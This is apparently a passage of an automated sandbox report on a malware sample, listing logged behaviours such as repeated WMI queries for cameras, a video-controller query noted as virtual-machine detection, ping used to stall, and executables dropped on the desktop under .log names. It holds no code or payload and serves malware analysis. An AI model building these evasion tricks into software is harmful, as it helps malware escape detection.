                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeMemory allocated: 1A600000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMemory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599861
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599614
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599374
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599265
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599156
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598968
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598453
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597656
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597250
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596141
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595406
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594437
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 593187
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592839
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591969
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591625
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591281
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590984
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590641
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590078
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 589594
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 589062
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 588547
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 588109
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587719
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587440
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587025
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 586641
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 586250
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585797
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585295
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585078
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584417
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584147
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583812
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583644
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583453
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583287
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582960
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582812
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582347
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582179
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582031
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581703
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581531
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581359
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581187
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581044
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580880
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580703
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580516
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580347
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580141
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579994
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579883
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579766
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579656
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579546
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579425
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579285
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579156
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579046
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578937
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578817
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578672
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578217
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578037
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577909
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577753
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577625
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577514
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577405
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577281
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577166
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577062
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576953
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576843
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576593
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576483
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576375
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2411Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3636Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3196Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3780Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3174
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWindow / User API: threadDelayed 6603
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWindow / User API: threadDelayed 2798
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\EBWcxehU.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\rpqvmOyM.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\RrWiEPnK.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\iOGyhUTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\XriZMeSE.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\TxdZLwor.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\CidbNaiX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\zeucltSv.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\BtlmWJui.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\ASylWHNt.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\oyzEfRxS.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\GmBsEsrN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\VDeRaRWG.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\QMyIEiey.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\YXDPTJnw.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\frGXBuRR.logJump to dropped file
